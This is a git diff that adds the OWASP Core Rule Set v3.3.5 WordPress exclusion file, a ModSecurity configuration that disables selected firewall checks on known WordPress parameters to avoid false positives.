diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
new file mode 100644
index 000000000..b4e75fa22
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
@@ -0,0 +1,760 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+# These exclusions remedy false positives in a default WordPress install.
+# The exclusions are only active if crs_exclusions_wordpress=1 is set.
+# See rule 900130 in crs-setup.conf.example for instructions.
+#
+# Note that the WordPress comment field itself is currently NOT excluded
+# from checking. The reason is that malicious content is regularly being
+# posted to WordPress comment forms, and there have been various cases
+# of XSS and even RCE vulnerabilities exploited by WordPress comments.
+
+SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \
+ "id:9002000,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-WORDPRESS"
+
+SecRule &TX:crs_exclusions_wordpress|TX:crs_exclusions_wordpress "@eq 0" \
+ "id:9002001,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-WORDPRESS"
+
+
+#
+# -=[ WordPress Front-End ]=-
+#
+
+
+#
+# [ Login form ]
+#
+
+# User login password
+SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
+ "id:9002100,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Reset password
+SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \
+ "id:9002120,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq resetpass" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
+
+
+#
+# [ Comments ]
+#
+
+# Post comment
+SecRule REQUEST_FILENAME "@endsWith /wp-comments-post.php" \
+ "id:9002130,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=931130;ARGS:url,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Gutenberg Editor ]
+# Used when a user (auto)saves a post/page with Gutenberg.
+#
+
+# Gutenberg
+SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/(?:posts|pages)" \
+ "id:9002140,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Gutenberg via rest_route for sites without pretty permalinks
+SecRule REQUEST_FILENAME "@endsWith /index.php" \
+ "id:9002141,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &ARGS:rest_route "@eq 1" \
+ "t:none,\
+ nolog,\
+ chain"
+ SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/(?:posts|pages)" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:json.content"
+
+# Gutenberg upload image/media
+SecRule REQUEST_FILENAME "@rx /wp-json/wp/v[0-9]+/media" \
+ "id:9002142,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveById=200002,\
+ ctl:ruleRemoveById=200003,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Gutenberg upload image/media via rest_route for sites without pretty permalinks
+SecRule REQUEST_FILENAME "@endsWith /index.php" \
+ "id:9002143,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &ARGS:rest_route "@eq 1" \
+ "t:none,\
+ nolog,\
+ chain"
+ SecRule ARGS:rest_route "@rx ^/wp/v[0-9]+/media" \
+ "t:none,\
+ ctl:ruleRemoveById=200002,\
+ ctl:ruleRemoveById=200003"
+
+#
+# [ Live preview ]
+# Used when an administrator customizes the site and previews the result
+# as a normal user.
+#
+
+# Theme select
+# Example: wp_customize=on&theme=twentyfifteen&customized=
+# {"old_sidebars_widgets_data":{"wp_inactive_widgets":[],
+# "sidebar-1":["search-2","recent-posts-2","recent-comments-2",
+# "archives-2","categories-2","meta-2"]}}&nonce=XXX&
+# customize_messenger_channel=preview-0
+SecRule ARGS:wp_customize "@streq on" \
+ "id:9002150,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &ARGS:action "@eq 0" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942200;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942260;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942300;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942330;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942340;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942370;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942430;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942431;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942460;ARGS:customized"
+
+# Appearance -> Widgets -> Live Preview
+SecRule ARGS:wp_customize "@streq on" \
+ "id:9002160,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@rx ^(?:|customize_save|update-widget)$" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942200;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942260;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942300;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942330;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942340;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942370;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942430;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942431;ARGS:customized,\
+ ctl:ruleRemoveTargetById=942460;ARGS:customized,\
+ ctl:ruleRemoveTargetById=920230;ARGS:partials,\
+ ctl:ruleRemoveTargetById=941320;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942180;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942200;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942260;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942330;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942340;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942370;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942430;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942431;ARGS:partials,\
+ ctl:ruleRemoveTargetById=942460;ARGS:partials"
+
+
+
+# Self calls to wp-cron.php?doing_wp_cron=[timestamp]
+# These requests may be missing Accept, Content-Length headers.
+# This rule must run in phase:1.
+SecRule REQUEST_FILENAME "@endsWith /wp-cron.php" \
+ "id:9002200,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveById=920180,\
+ ctl:ruleRemoveById=920300,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Cookies ]
+
+# WP Session Manager
+# Cookie: _wp_session=[hex]||[timestamp]||[timestamp]
+# detected SQLi using libinjection with fingerprint 'n&1'
+SecRule REQUEST_COOKIES:_wp_session "@rx ^[0-9a-f]+\|\|\d+\|\|\d+$" \
+ "id:9002300,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &REQUEST_COOKIES:_wp_session "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942100;REQUEST_COOKIES:_wp_session"
+
+
+#
+# -=[ WordPress Administration Back-End (wp-admin) ]=-
+#
+
+# Skip this section for performance unless /wp-admin/ is in filename
+
+SecRule REQUEST_FILENAME "!@contains /wp-admin/" \
+ "id:9002400,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-WORDPRESS-ADMIN"
+
+SecRule REQUEST_FILENAME "!@contains /wp-admin/" \
+ "id:9002401,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-WORDPRESS-ADMIN"
+
+
+#
+# [ Installation ]
+#
+
+# WordPress installation: exclude database password
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/setup-config.php" \
+ "id:9002410,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:step "@streq 2" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:step "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd"
+
+# WordPress installation: exclude admin password
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/install.php" \
+ "id:9002420,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:step "@streq 2" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:step "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text"
+
+
+#
+# [ User management ]
+#
+
+# Edit logged-in user
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \
+ "id:9002520,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq update" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=931130;ARGS:url,\
+ ctl:ruleRemoveTargetById=931130;ARGS:facebook,\
+ ctl:ruleRemoveTargetById=931130;ARGS:instagram,\
+ ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\
+ ctl:ruleRemoveTargetById=931130;ARGS:myspace,\
+ ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\
+ ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\
+ ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\
+ ctl:ruleRemoveTargetById=931130;ARGS:youtube,\
+ ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
+
+# Edit user
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \
+ "id:9002530,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq update" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=931130;ARGS:url,\
+ ctl:ruleRemoveTargetById=931130;ARGS:url,\
+ ctl:ruleRemoveTargetById=931130;ARGS:facebook,\
+ ctl:ruleRemoveTargetById=931130;ARGS:instagram,\
+ ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\
+ ctl:ruleRemoveTargetById=931130;ARGS:myspace,\
+ ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\
+ ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\
+ ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\
+ ctl:ruleRemoveTargetById=931130;ARGS:youtube,\
+ ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
+
+# Create user
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \
+ "id:9002540,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq createuser" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=931130;ARGS:url,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2"
+
+
+#
+# [ General exclusions ]
+#
+
+# _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages
+SecAction \
+ "id:9002600,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\
+ ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\
+ ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\
+ ver:'OWASP_CRS/3.3.5'"
+
+#
+# [ Content editing ]
+#
+
+# Edit posts and pages
+# /wp-admin/post.php, /wp-admin/post.php?t=[timestamp]
+# - Themes do not properly escape post_title in HTML, so beware of XSS
+# and be conservative in excluding this parameter.
+# - Parameter _wp_http_referer can appear multiple times.
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \
+ "id:9002700,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@rx ^(?:edit|editpost)$" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\
+ ctl:ruleRemoveById=920272,\
+ ctl:ruleRemoveById=921180"
+
+# Autosave posts and pages
+# ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
+ "id:9002710,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq heartbeat" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\
+ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\
+ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\
+ ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\
+ ctl:ruleRemoveById=921180,\
+ ctl:ruleRemoveById=920272"
+
+# Edit menus
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \
+ "id:9002720,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq update" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\
+ ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\
+ ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data"
+
+# Edit text widgets (can contain custom HTML)
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
+ "id:9002730,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]"
+
+# Reorder widgets
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
+ "id:9002740,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq widgets-order" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\
+ ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\
+ ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]"
+
+# Create permalink sample for new post
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
+ "id:9002750,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq sample-permalink" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title"
+
+# Add external link to menu
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
+ "id:9002760,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq add-menu-item" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]"
+
+# Editor: Add Media, Insert Media, Insert into page
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
+ "id:9002770,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:action "@streq send-attachment-to-editor" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html"
+
+
+#
+# [ Options and Settings ]
+#
+
+# Change site URL
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \
+ "id:9002800,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:option_page "@streq general" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:option_page "@eq 1" \
+ "t:none,\
+ chain"
+ SecRule ARGS:action "@streq update" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=931130;ARGS:home,\
+ ctl:ruleRemoveTargetById=931130;ARGS:siteurl"
+
+# Permalink settings
+# permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \
+ "id:9002810,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetById=920230;ARGS:selection,\
+ ctl:ruleRemoveTargetById=920272;ARGS:selection,\
+ ctl:ruleRemoveTargetById=942431;ARGS:selection,\
+ ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\
+ ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\
+ ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\
+ ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\
+ ver:'OWASP_CRS/3.3.5'"
+
+# Comments blacklist and moderation list
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \
+ "id:9002820,\
+ phase:2,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule ARGS:option_page "@streq discussion" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:option_page "@eq 1" \
+ "t:none,\
+ chain"
+ SecRule ARGS:action "@streq update" \
+ "t:none,\
+ chain"
+ SecRule &ARGS:action "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys"
+
+# Posts/pages overview search
+SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \
+ "id:9002830,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\
+ ver:'OWASP_CRS/3.3.5'"
+
+
+#
+# [ Helpers ]
+#
+
+# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common,
+# admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,
jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D= +# wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget, +# jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1 +# +# /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons, +# admin-bar,buttons,media-views,common,forms,admin-menu,dashboard, +# list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D= +# s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1 +# +# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, +# admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer, +# wp-ajax-response,jquery-color,wp-lists,quicktags, +# jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core, +# jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore, +# customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install, +# wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter, +# jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e +SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ + "id:9002900,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=921180,\ + ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\ + ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\ + ctl:ruleRemoveTargetById=942360;ARGS:load[],\ + ctl:ruleRemoveTargetById=942430;ARGS:load[],\ + ctl:ruleRemoveTargetById=942431;ARGS:load[],\ + ctl:ruleRemoveTargetById=942432;ARGS:load[],\ + ver:'OWASP_CRS/3.3.5'" + + +SecMarker "END-WORDPRESS-ADMIN" + + +SecMarker "END-WORDPRESS" diff --git 